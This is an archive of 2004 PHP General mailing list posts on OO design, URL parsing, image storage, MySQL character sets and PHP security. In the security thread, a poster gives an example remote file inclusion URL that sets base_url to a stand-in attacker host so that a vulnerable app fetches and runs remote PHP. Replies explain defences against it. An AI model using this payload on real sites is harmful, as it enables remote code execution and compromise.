On Fri, 10 Dec 2004 17:17:53 -0500, Greg Beaver <[EMAIL PROTECTED]> wrote:
> yep, unless the function names happen to conflict with ones you've
> already written.

for file in *.php; do
    # work on a copy so sed never reads and writes the same file
    cp "$file" "$file.tmp"
    sed -e "s/bad/good/g" "$file.tmp" > "$file"
    rm "$file.tmp"
done


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


RE: [PHP] How to post form-data to a host using PHP

2004-12-10 Thread Jay Blanchard
[snip]
Does anybody know how to post form-data to a host using PHP? Thanks for
the answer.
[/snip]

Yes. You're welcome.





You may want to Google for PHP tutorials. They're easy and go step by
step.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Friendly URL

2004-12-10 Thread Richard Lynch
Bruno B B Magalhães wrote:
> Hi guys,
>
> As part of my framework I have a URI decoder so it explode, remove
> unnecessary data (as GET query) and put it into an array...
>
> Is there any better way of doing this (faster?), just wondering.
>
>   if(isset($_SERVER['REQUEST_URI']) === true)
>   {
>   $path = explode('/',$_SERVER['SCRIPT_NAME']);
>
>   $total_paths = count($path);
>
>   $path = 
> stristr($_SERVER['REQUEST_URI'],$path[$total_paths-1]);
>
>   $path = explode('/',$path);
>
>   $total_paths = count($path);
>
>   $i = 0;
>
>   for($i=0;$i<$total_paths;$i++)
>   {
>   $get_string = false;
>
>   $get_string = stristr($path[$i],'?');
>
>   if($get_string)
>   {
>   $get_string = "\\".$get_string;
>   $this->uri[$i] =
> strtolower(addslashes(strip_tags(eregi_replace($get_string,'',$path[$i])
> )));
>   }
>   else
>   {
>   $this->uri[$i] = 
> strtolower(addslashes(strip_tags($path[$i])));
>   }
>   }
>   }

I could be wrong, but I think you've just re-written the code that is
already in PHP to give you $_SERVER['PATH_INFO']



-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] Not quite PHP, but related...

2004-12-10 Thread Bruno B B Magalhães
Hi you all,
is that possible using .htaccess to redirect every request to a 
specified script?

for example if you have:
http://www.yoursite.com/en/articles/blab.html
where there isn't a en dir., so it would be redirected to
public_html/site
I could use error page, but it won't receive post, get, cookie and 
session headers.

Regards,
Bruno B B Magalhaes
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Multiple Inheritance

2004-12-10 Thread Greg Beaver
Greg Donald wrote:
> with it, but I will go grab a PEAR module if it fits my needs. Code
> re-use may be the only redeeming quality of OO programming, and
> honestly I can re-use your code from a non-OO include file just as
> easily.

yep, unless the function names happen to conflict with ones you've 
already written.  Then, you run into the 
oh-crap-I-should-have-planned-to-use-other-code-oh-well-I-guess-I'll-rename-everything-and-waste-hours 
problem.  Class names occasionally conflict, but this tends to be a much 
smaller and simpler search-and-replace.

Until PHP gets namespaces (translation: never), OO is the only way to do 
code re-use.  Of course, most PHP programmers believe it is faster to 
write everything from scratch.

More power to them, I'll use [good] code that already exists over my own 
"brilliant solutions" any day, thank you very much.

I would challenge anyone advocating functions: how many of you have had 
to modify your function-based program to do a similar thing and been 
forced to rewrite?  Even with well-designed functions, you end up with 
this problem - code modification is impossible.  This is why I hardly 
ever use static methods or functions.  Notice - I do use these things, 
but you have to know when it is appropriate to do so.

functions and static methods should be used for code that you can 
guarantee you *don't* want to change - ever (well, at least almost 
never).  Anything that you may need to extend or modify functionality 
must be implemented with something more flexible, or you're going to get 
screwed at some point.  Static methods should be used for any functions 
that are re-distributable so that others can plug them in without risk 
of name conflicts.

If you're writing the code for Yahoo like Rasmus, you're going to write 
the fastest code imaginable, and you will also be working on the C code 
to do things.

If you're writing the code for podunk.com, or even for a mid-level 
traffic site, it is extremely unlikely that you will notice even the 
slightest difference between OO and non-OO code.  The biggest hogs in 
php programming are:

1) unnecessary images and animated crap/unnecessary javascript
2) terrible database usage
3) too much complexity in the design

It doesn't matter whether you are using OO or functions - if your 
application has too many lines of code per task, it won't be fast.

Greg
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Re: PHP Security

2004-12-10 Thread Greg Donald
On Fri, 10 Dec 2004 14:07:21 -0800, [EMAIL PROTECTED]
<[EMAIL PROTECTED]> wrote:
> And, by the way, once you upload it into a database, it's not a file.  It's just
> a data field.

And the data fields are just files on the file system.  Look at the
way Postgres stores data.

The filesystem itself is just a low level database.

I make these sort of choices by benchmark whenever possible:
http://www.zend.com/zend/trick/tricks-sept-2001.php


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] allow_url_fopen ini directive not enough

2004-12-10 Thread Richard Lynch
KJ wrote:
> OK, apologies on my part, I did not correctly explain the problem which
> can and has arisen from remote includes.
>
> I'll try to explain the problem that I have come across twice in the
> last couple of years both with popular software packages that I
> downloaded like thousands of others and both with exactly the same
> vulnerability and both resulted in my site being compromised and having
> to resort to backups.
>
> The vulnerability occurred where both applications had a variable setting
> a base directory of the source code, which was used when including files
> throughout the application, i.e.:
>
> $base_url = '/home/example.com/www';
> include_once ($base_url.'/config.php');
>
> In config.php you would then have, for example:
>
>  include_once ($base_url.'/whatever.php');
> ...
> ?>
>
> Now in each instance register globals was on and all that was needed to

You should turn register_globals off, first of all.

Secondly, something is very very very wrong in your analysis.

If this line of code gets executed:

$base_url = '/home/example.com/www';

then the setting of register_globals can have *NO* effect on $base_url.

It is being initialized, as it should, to a correct value, in that line of
code.  Any GET/POST data being sent in, is junked when that line is
executed.

Therefore, they must *ALSO* be surfing to a page which does not correctly
'include' the code which sets $base_url in the first place.

So, not only do you have register_globals "on" which is a Bad Idea, you've
got PHP files in your web tree that they can surf to, bypass your
configuration setting of $base_url, and execute code that the Programmer
never ever ever intended to be executed out of sequence (IE, without
having the code in config.php executed)

This is a MUCH BIGGER PROBLEM than remote include working or not.

You've *GOT* to get those files *OUT* of the web-tree.

The only files that belong in the web tree are those that should be surfed
to.

If you can't do that, for whatever reason, you may be able to stop those
files from being executed outside the context in which they were intended:
 Convince Apache *not* to execute ".inc" files as PHP, for example.

Of course, some well-intentioned, but badly-designed, packages use
".inc.php" to force the execution of "include" files as PHP.

As we have seen here, you simply do not *want* that to happen.  Executing
snippets of code out of the context in which they were programmed is just
plain foolhardy.

So force any ".inc.php" files to *NOT* be executed by PHP, while leaving
".php" working, of course.

Once you have done that, the remote include can't work, because nothing
gets executed unless $base_url is properly initialized.

If you only shut down remote include, but leave these other issues
unaddressed, you're going to be restoring from a backup again sooner or
later anyway.

You've got huge chunks of code in those packages that the bad guys are
executing all out of any sort of order that the Programmer ever even
thought about them.

It's hard enough to find bugs and security flaws when your code is
executed in order:  It's IMPOSSIBLE to do so when your source code is
thrown in a blender with no lid and the parts that fly out get executed.

> compromise the site was to have a variable passed in the url to set the
> base url to a remote site, which in turn output php to execute, i.e.:
>
> http://example.com/config.php?base_url=http://myhacksite.example.com
>
> Now, you are correct that education on how to avoid this kind of issue
> is key, however that does not avoid the problem. Turning off register
> globals would prevent many of these attacks, however there are still
> many apps out there that require register globals to be on and there are
> other ways to use this exploit with them off.

Please explain these other ways, or provide references.

Not claiming they don't exist, but unless you identify them as well,
there's no way to solve them.

Also, if an application requires register_globals on at this point in
time, it may be prudent to simply not support the installation of that
package.

That may seem harsh, even unreasonable, but at some point, it's time for
the application developers, who have quite some time now, to make their
software well-behaved with register_globals OFF.

If they are ignoring this obvious, well-documented, easily fixed issue,
then you should be running away screaming from their source code, because
who knows what more subtle security issues are lurking in there?

> Now all I'm saying is that given the potential for damage and , from my
> point of view, the little improvement that this feature actually
> provides, why would you NOT have a way of disabling it. I would if I
> could, and I know of others who would as well.
>
> Any thoughts?

> PS: If you gave someone that you didn't trust access to your scripts
> then you're asking for trouble, that was not my point and was not part
> of any kind of thinking towards this request.

No, but it is

Re: [PHP] allow_url_fopen ini directive not enough

2004-12-10 Thread KJ
OK, I don't think you've read my posts in much detail at all. It looks as 
though you have skimmed over them and got a pre-determined idea of my 
issue in your head.

Not once have I mentioned anything about "customers" in my posts. I'm 
not a web host. I'm not talking about people who have access to my web 
server uploading malicious scripts; I know that if I give people that I 
don't trust access to my server then they could f**k things up... 
obviously. I'm not a script kiddie who wants to stop people using the 
mail() function or something like that, I'm talking about a real life 
vulnerability.

Let me try to paint another simple scenario:
1. You have a shared hosting account with example.com hosted on it.
2. You want a guestbook setup on it, and you've found one that you like.
3. You install "phpMyFantasticGuestbook" onto your account.
4. It's a well used application and thus you don't go through the source 
to check for vulnerabilities.
5. Joe Hacker has studied the script coz he's a tart that wants to piss 
people off and he has found a vulnerability.
6. Joe Hacker uses the vulnerability to change your account passwd. He 
then logs in as you and deletes all your files. He has access to your 
mysql password which was in the config file of phpMyFantasticGuestbook 
and he deletes all your data, he then leaves a nice index.php in your 
account to say that he's been by.

This is what I'm talking about, I hope this is clear. The vulnerability I 
described in one of my previous posts.

The "worry" that I'm expending comes from being hacked twice using this 
method, I think the amount of worry expended is in line with the amount 
of frustration that I have endured.

KJ

Richard Lynch wrote:
> Call me silly, but...
>
> If you don't check the source code, and you think they might be using
> include "http://";...
>
> What's the difference between that and not checking all the zillion things
> your customers might do that's about 100 X as stupid?
>
> Seems to me you're expending a fair amount of 'worry' over something that,
> given that you're not checking their source in the first place, is kind of
> meaningless...
>
> Not that I'm suggesting that you *SHOULD* be checking their source -- Only
> that the risk you take as part and parcel of your business is untrusted
> users putting code on your machine.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Multiple Inheritance

2004-12-10 Thread Greg Donald
On Fri, 10 Dec 2004 13:04:49 -0800, Justin Palmer
<[EMAIL PROTECTED]> wrote:
> What if you were to build an application around the MySQL database.  You
> have just finished the project and you are taking it to your boss.  You
> get there and then your boss says, "you know what I would rather use
> Oracle as our database".  With this situation you have, potentially,
> wasted many hours writing the MySQL version.  What are you going to do
> now, say something like, "Sorry boss, my application I designed is not
> flexible enough for me to switch db's at this time.", as your promotion
> for completing the project goes down the drain.

If your boss switches databases at the end of the project then he's an
idiot and it should be his problem, not yours.

There are a number of database abstration layers out there btw  :)  We
use ADOdb.


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-10 Thread I l

> Yeah, with any luck at all, your binary file will corrupt itself, and then
> make your entire database unreadable by anybody, even you.

really? Then my company's database should be corrupt by now...right? Haven't 
had any problems yet. Well, it's only been running for 2 years now.

> I l wrote:
>> the best security practice is to store the jpg file or any other uploaded
>> file in your mySql database. This way you never have to worry about
>> someone
>> executing php by the url like www.example.com/pic.jpg. To view the file,
>> the
>> user would type www.example.com/veiw.php?fileID=3425433345.
>>
>> You can also keep information about the file uploaded in your mysql such
>> as
>> IP address.
>>
>> I can't really see any security problems here.
>
> Yeah, with any luck at all, your binary file will corrupt itself, and then
> make your entire database unreadable by anybody, even you.
>
> Now *THAT'S* secure!
>
> :-)
>
> Secret Tip:
>
> There is a little-known feature of an incredibly-efficient high-volume
> thoroughly-tested software base that makes it very very very good at
> storing  and retrieving large binary files such as JPEGs and other rich
> media with very small chance of file corruption, and even less chance of
> file corruption affecting other data or applications.
>
> I'm not really sure I should tell you about this great secret feature, but
> I guess I might as well...
>
> It's called the "File System" and it's packaged with your Operating System.
>
> :-)
>
> Storing JPEGs in your database instead of the file system is like keeping
> your groceries in the trunk of your car outside in the winter instead of
> in the fridge.  It will work, but it's not really the best idea.
>
> YMMV
>
> --
> Like Music?
> http://l-i-e.com/artists.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Multiple Inheritance

2004-12-10 Thread Greg Donald
On Fri, 10 Dec 2004 10:32:30 -0800 (PST), Richard Lynch <[EMAIL PROTECTED]> 
wrote:
> What I do is not use classes.

I agree.

Some of the worst arguments for OO I've heard recently:

"OO programming lets you organize your code better."
So what you're saying is that you're not capable of organizing similar
functions into files and directories and using include() or require()
as needed?

"OO programming lets lots of developers work on the same code base
easier."
Malarkey[1].  The Linux Kernel crew gets along fine with no OO code.
Hundreds of thousands (millions?) of lines of code with thousands of
developers contributing daily.  A good revision control system is all you
need.

"Using OO programming is more efficient"
Where are your benchmarks?

Then you have scenarios where you have to come behind coders who think
they know OO, but they make poorly designed classes and end up calling
lots of functions statically like Object::foo().. which totally defeats
the purpose of objects along the way.

> At all.

And then you run into real life.  I'm working at a place right now
where they love OO programming.  We use Mojavi, PEAR, and Smarty
everywhere.  I understand OO pretty well I think, and I'm studying
the latest Mojavi framework.  Hopefully I'll be ahead of the curve
on the next project later down the road.  I don't really enjoy OO
programming and I don't think I'd ever code one of my own projects
with it, but I will go grab a PEAR module if it fits my needs. Code
re-use may be the only redeeming quality of OO programming, and
honestly I can re-use your code from a non-OO include file just as
easily.

It just doesn't make sense to instantiate objects for a script whose
total execution lifetime is less than a second or two.  The overhead
just isn't worth it.


http://www.geocities.com/tablizer/oopbad.htm


[1] ma·lar·key also ma·lar·ky (m-lärk)
n. Slang

Exaggerated or foolish talk, usually intended to deceive:
"snookered by a lot of malarkey" (New Republic).


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-10 Thread Richard Lynch
I l wrote:
> the best security practice is to store the jpg file or any other uploaded
> file in your mySql database. This way you never have to worry about
> someone
> executing php by the url like www.example.com/pic.jpg. To view the file,
> the
> user would type www.example.com/veiw.php?fileID=3425433345.
>
> You can also keep information about the file uploaded in your mysql such
> as
> IP address.
>
> I can't really see any security problems here.

Yeah, with any luck at all, your binary file will corrupt itself, and then
make your entire database unreadable by anybody, even you.

Now *THAT'S* secure!

:-)

Secret Tip:

There is a little-known feature of an incredibly-efficient high-volume
thoroughly-tested software base that makes it very very very good at
storing  and retrieving large binary files such as JPEGs and other rich
media with very small chance of file corruption, and even less chance of
file corruption affecting other data or applications.

I'm not really sure I should tell you about this great secret feature, but
I guess I might as well...

It's called the "File System" and it's packaged with your Operating System.

:-)

Storing JPEGs in your database instead of the file system is like keeping
your groceries in the trunk of your car outside in the winter instead of
in the fridge.  It will work, but it's not really the best idea.

YMMV

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] How to post form-data to a host using PHP

2004-12-10 Thread Yao, Minghua
Hi,

Does anybody know how to post form-data to a host using PHP? Thanks for the 
answer.

-Minghua


Re: [PHP] Spurious newlines when requesting empty php file

2004-12-10 Thread Richard Lynch
Carl Michael Skog wrote:
> Some strange results with spurious newlines inserted in the response when
> requesting a php file has led me to investigating what happens when a
> completely empty php-file is requested.
>
> I would have thought that the response from a empty php file would also be
> empty, but, to my surprise, they consist of 3 newlines !!!
>
> The strange thing is that I observed this behaviour on two completely
> unrelated servers.
>
> Is this what can be expected or is it a result of misconfiguration ?

I just tried this with an empty PHP file, and got exactly what I expected.

A valid response with no content at all.

Please specify your software versions, and provide URLs and, as silly as
this sounds, an "ls -als empty.php" so we can see your empty PHP file.

Also check php.ini for auto_prepend_file and auto_append_file settings,
which might be tacking on blanks.

And, if you are using this as an "empty" file:
--- not quite empty file -

--
then PHP is quite right to send out the newline at the end.


- really empty file -
-

Note that some editors, under some configurations, will *ADD* a newline to
a file on the last line for historical reasons.

Re-configure your editor *now* if yours does that, our include files and
calls to http://php.net/header will drive you crazy, or you'll end up
mis-using output buffering to "solve" your non-problem.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Close all open tags in HTML text

2004-12-10 Thread Richard Lynch
Matt Palermo wrote:
>  I would like to leave any HTML in there,

Do you *TRUST* the people typing the HTML to not attack your server, or
others, with cross-site scripting attacks?

If not, go re-read the manual about strip_tags, and pay particular
attention to the second, optional, argument.

> but just make sure that ending
> tags exist, so it doesn't screw up the rest of the page.  Strip tags would
> just wipe out the HTML rather than allowing it and ending it safely.

Strip tags will allow you to wipe out *DANGEROUS* HTML which will make
your web server a source of problems not only to you, but to me as well.

Please use strip_tags to allow only the tags you *NEED* the users to be
able to use.

It will only take you seconds, and it will save you (and us) a lot of
grief in the long run.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Configuring PHP 5.0.2 on OpenBSD 3.6: png.h not found

2004-12-10 Thread Richard Lynch
Raymond C. Rodgers wrote:
> Having previously built PHP 4.x on OpenBSD 3.x in the past, I'm running
> into some difficulties configuring PHP 5.0.2 currently. On a fresh
> install of OpenBSD, I have confirmed installation of libpng 1.2.5p5, but
> no matter what png related switch ("--with-png-dir=" and "--with-png=")
> I use for configure, I get png.h not found.
>
> I have done a bit of searching but haven't been able to come up with any
> other similar problems... Does anyone have any idea about how to correct
> this?

Where exactly is png.h in your directory system?
If libpng is installed, it should be there.

What are you using after the --with-png-dir=
Whatever you are using, it must be a directory far enough *above* png.h to
encompass not only '/include/*/png.h' but also '/lib/*/*png*.so'
Many beginners mistakenly pass in the directory that contains 'png.h' --
Alas, PHP *also* needs to find all the png library binary files (.so) in
order to pull them in.
So starting at png.h, work your way 'up' until you hit a directory that
also has *png*.so down inside it somewhere (perhaps one or two levels
deep) and pass *that* directory with --with-png-dir=



-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] Friendly URL

2004-12-10 Thread Bruno B B Magalhães
Hi guys,
As part of my framework I have a URI decoder so it explode, remove
unnecessary data (as GET query) and put it into an array...

Is there any better way of doing this (faster?), just wondering.

if(isset($_SERVER['REQUEST_URI']) === true)
{
    $path = explode('/',$_SERVER['SCRIPT_NAME']);

    $total_paths = count($path);

    $path = stristr($_SERVER['REQUEST_URI'],$path[$total_paths-1]);

    $path = explode('/',$path);

    $total_paths = count($path);

    $i = 0;

    for($i=0;$i<$total_paths;$i++)
    {
        $get_string = false;

        $get_string = stristr($path[$i],'?');

        if($get_string)
        {
            $get_string = "\\".$get_string;
            $this->uri[$i] = strtolower(addslashes(strip_tags(eregi_replace($get_string,'',$path[$i]))));
        }
        else
        {
            $this->uri[$i] = strtolower(addslashes(strip_tags($path[$i])));
        }
    }
}

Regards,
Bruno B B Magalhaes
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Re: PHP Security

2004-12-10 Thread rogerk
Quoting I l <[EMAIL PROTECTED]>:
> So, you would prefer storing the uploaded file in your directory than a
> database? Have you tried either method?

And, by the way, once you upload it into a database, it's not a file.  It's just
a data field.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-10 Thread rogerk
Quoting I l <[EMAIL PROTECTED]>:

> I never said that this method wouldn't cause you overhead. With all respect,
> I am simply stating that this method is much simpler. Sometimes you must
> choose simplicity over processing costs. What if there was another
> programmer editing your code? Or, you came back to the same code after one
> year? You better make sure that it is documented well.

I'm not arguing that programming simplicity and efficiency should be sacrificed
to system efficiency.  I'm arguing that your perspective is one that assumes
that files will only ever be touched by a PHP application doing database
queries.

I believe file system interactions -- especially in a domain where files may be
used by different applications -- are better understood and better known than
they are database interactions.

> So, you would prefer storing the uploaded file in your directory than a
> database? Have you tried either method?

Yes, of course.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] allow_url_fopen ini directive not enough

2004-12-10 Thread Richard Lynch
KJ wrote:
>>
>> Basically this particular case boils down to: "files that are included
>> and
>> should not a be called directly" should not be allowed to be called
>> directly.
>>
>> You can do this at the application level whereby each included file
>> checks
>> whether it was called directly and refuse to run when that is so.
>>
>> Or you can do this on a system level and tell your webserver not to
>> allow
>> access to particular files or directories.
>
> Yes, you could do either of the above.
>
> I don't have an issue with solutions that PHP (or Apache) provide for
> avoiding this problem. I DO have an issue with the fact that this
> problem is caused by a single "feature" is probably not used by many and
> should be able to be turned off, much like register globals.
>
> Forget possible solutions and work arounds for one moment; when I
> download and install a popular application, I don't go through every bit
> of source code to check if these workarounds have been applied. I would
> much rather set a allow_url_include flag to "off", and not have to worry
> about that. There are plenty of things you need to worry about when
> hosting, and this would create one less.

Call me silly, but...

If you don't check the source code, and you think they might be using
include "http://";...

What's the difference between that and not checking all the zillion things
your customers might do that's about 100 X as stupid?

Seems to me you're expending a fair amount of 'worry' over something that,
given that you're not checking their source in the first place, is kind of
meaningless...

Not that I'm suggesting that you *SHOULD* be checking their source -- Only
that the risk you take as part and parcel of your business is untrusted
users putting code on your machine.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
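
The application-level measures discussed in this thread (a base directory that request data cannot influence, and include files that refuse to run when requested directly), as an added example that is not code from any poster or package. APP_ENTRY, resolve_include() and the throwaway lib directory are assumptions; the rejected URL is the one quoted earlier in the thread.

```php
<?php
// Added example; APP_ENTRY, resolve_include() and the directory layout are assumptions.

// Entry script: the only file meant to be requested directly.
define('APP_ENTRY', true);

/**
 * Map a logical name to a file inside $libDir, which should live outside the web tree.
 * The directory is fixed by the code, never taken from GET/POST/cookie data.
 */
function resolve_include(string $libDir, string $name): string
{
    // Plain stems only: rejects "http://host/x", "../x", "x.php?y" and empty names.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $name)) {
        throw new InvalidArgumentException("rejected include name: $name");
    }
    $root = realpath($libDir);
    $file = realpath($libDir . DIRECTORY_SEPARATOR . $name . '.php');
    // realpath() resolves symlinks; the result must still sit under $root.
    if ($root === false || $file === false
        || strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException("no such include: $name");
    }
    return $file;
}

// Constructed demo: a throwaway lib directory holding one include file.
$lib = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lib_demo_' . getmypid();
@mkdir($lib);
file_put_contents($lib . DIRECTORY_SEPARATOR . 'config.php', <<<'PHP'
<?php
// Guard at the top of every include file: refuse to run when requested directly.
if (!defined('APP_ENTRY')) { http_response_code(403); exit('Forbidden'); }
return ['site_name' => 'example'];
PHP
);

// Normal use: the entry script has defined APP_ENTRY, so the include loads.
$config = require resolve_include($lib, 'config');
echo $config['site_name'], "\n";

// Names that must never reach include/require.
foreach (['http://myhacksite.example.com', '../config', 'missing'] as $bad) {
    try {
        resolve_include($lib, $bad);
        echo "accepted $bad\n";
    } catch (Exception $e) {
        echo get_class($e), ': ', $e->getMessage(), "\n";
    }
}

// Clean up the constructed demo files.
unlink($lib . DIRECTORY_SEPARATOR . 'config.php');
rmdir($lib);
```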



RE: [PHP] PHP4 mysqli with mysql 4.1.7?

2004-12-10 Thread Richard Lynch
Francis Mak wrote:
>> What happens in your application if you just do:
>>
>> mysql_query("SET CHARACTER SET utf8", $connection) or
>> die(mysql_error());
>>
>> right after you connect to the database?
>
> Thank you, by adding mysql_query("SET CHARACTER SET utf8", $connection),
> it
> works now.  However, I am still confused on some issue:
>
> 1. Is it possible to set the PHP mysql client to use utf8 as default?  In
> this way, I do not need to modify all of my applications.

No idea.

But you could move this query to right after the mysql_connect() line in
your applications, which should really be a very limited number of
places.

> 2. Why mysqli + 4.1.x is recommended?

I haven't the foggiest idea on this one.  Hell, I don't even know what
mysqli *IS* for that matter...

I'm getting old and can't keep up with these whippersnapper PHP Developers
any more :-)

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-10 Thread rogerk
Quoting I l <[EMAIL PROTECTED]>:

> Let's say you want to store someone's picture.
>
> In the database, you would insert the picture, who owns that picture, maybe
> the ip address and request headers of where that picture came from, the
> category, sub-category, sub-sub-category in which the picture belongs to,
> etc. You can gather and store as much information about that picture as you
> want with ease.
>
> When you want to access that file and its attributes, you only have to do
> one database query.

...which decomposes to multiple file system accesses.

> Wouldn't you agree that this structure is much easier to manage than storing
> the file in a directory, then storing that extra information in a database?
> Then to retrieve, you must do a database query and find the file in the
> FILESYSTEM (hoping it is still there). The code is much more complex

First, I'm probably doing more system work to access the file contents as part
of a database record, since the attributes of that superblobby field are
different from those of the short metadata describing it.

Second, I'm forcing EVERY access to that picture, even the ones by standalone
non-webbish utilities that don't care about the metadata at all, to use a
heavyweight database engine instead of the filesystem code embedded in the
operating system... which gets used by the DBMS anyway, but less efficiently.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-10 Thread I l
I never said that this method wouldn't cause you overhead. With all respect, 
I am simply stating that this method is much simpler. Sometimes you must 
choose simplicity over processing costs. What if there was another 
programmer editing your code? Or, you came back to the same code after one 
year? You better make sure that it is documented well.

So, you would prefer storing the uploaded file in your directory than a 
database? Have you tried either method?

> > Let's say you want to store someone's picture.
> >
> > In the database, you would insert the picture, who owns that picture, maybe
> > the ip address and request headers of where that picture came from, the
> > category, sub-category, sub-sub-category in which the picture belongs to,
> > etc. You can gather and store as much information about that picture as you
> > want with ease.
> >
> > When you want to access that file and its attributes, you only have to do
> > one database query.
>
> ...which decomposes to multiple file system accesses.
>
> > Wouldn't you agree that this structure is much easier to manage than storing
> > the file in a directory, then storing that extra information in a database?
> > Then to retrieve, you must do a database query and find the file in the
> > FILESYSTEM (hoping it is still there). The code is much more complex
>
> First, I'm probably doing more system work to access the file contents as part
> of a database record, since the attributes of that superblobby field are
> different from those of the short metadata describing it.
>
> Second, I'm forcing EVERY access to that picture, even the ones by standalone
> non-webbish utilities that don't care about the metadata at all, to use a
> heavyweight database engine instead of the filesystem code embedded in the
> operating system... which gets used by the DBMS anyway, but less efficiently.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Removing a return character

2004-12-10 Thread Richard Lynch
Shaun wrote:
> I have a system that scans through a CSV File and inserts each row into a
> database. I have just noticed that some rows have a return character in
> them - a small square - and this is causing errors in the mysql query.
>
> Does anyone know how I can remove such characters?

Might I point out that if those 'return' characters are in your content,
you may not want to get rid of them at all, as they could indicate
paragraphs...

I don't know how you can convince MySQL to keep them or fix your code to
present the correct data from the CSV file, but throwing out the paragraph
markers in your content is probably not a Good Idea if there is any kind
of significant amount of content involved.

Programmer's Motto:
Been there; done that; had to re-do it.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


RE: [PHP] Confused - $GLOBALS

2004-12-10 Thread Richard Lynch
>> I always forget, because they changed it around on POST/GLOBALS/etc at
>> some point, but only on some of them.  Grrr.
>
> The built-in arrays with names beginning $_ are "superglobals", i.e. always
> global anyway.  The only other "superglobal" is $GLOBALS, which is a naming
> exception because it existed long before the $_ arrays came into existence.
> This has not changed at any point in the life of PHP -- the only change was
> the actual introduction of the $_ versions.

Allow me to be more precise.

In version 4.1.0 of December 2001's change log, we find this entry:

"Introduced $_GET, $_POST, $_COOKIE, $_SERVER and $_ENV variables, which
deprecate the old $HTTP_*_VARS arrays. In addition to be much shorter to
type - these variables are also available regardless of the scope, and
there's no need to import them using the 'global' statement. (Andi &
Zeev)"

Therefore my perpetual confusion about which thingies are superglobals
comes from the old $HTTP_*_VARS arrays, which are not superglobals, and
their $_* vars which have the same data, but are superglobals, and the
$GLOBALS variable, which has always been a superglobal.

So when I was supposed to go convert all my $HTTP_*_VARS, I *also* had to
get rid of all the places I used to have to make them global, but now I
don't any more...  Woof.  Can't just global search and replace my source
code, can I?

Now I know why I'm making that change piece-meal. :-^

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-10 Thread John Nichel
I l wrote:
> Let's say you want to store someone's picture.
>
> In the database, you would insert the picture, who owns that picture,
> maybe the ip address and request headers of where that picture came
> from, the category, sub-category, sub-sub-category in which the picture
> belongs to, etc. You can gather and store as much information about that
> picture as you want with ease.

I can store all this information in a db without storing the binary
image in the table too.

> When you want to access that file and its attributes, you only have to
> do one database query.

I would have to do one query to get the attributes regardless if the
image itself was in the db or the filesystem.

> Wouldn't you agree that this structure is much easier to manage than
> storing the file in a directory, then storing that extra information in
> a database? Then to retrieve, you must do a database query and find the
> file in the FILESYSTEM (hoping it is still there). The code is much more
> complex

One if statement...if ( file_exists (...) ); Complex?  Not at all.  You
should be checking it regardless if the image is in the db or not...yes,
an image could be deleted off of the filesystem, and it could be deleted
out of the db too.  Binary data in the db could become corrupt.  All
kinds of things can happen.  Just assuming that you don't have to check
your data just because it's coming from a db isn't less complex, it's
lazy, and asking for problems.

In the end, it boils down to personal preference, but the filesystem is 
still better suited to store binary data than a db.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


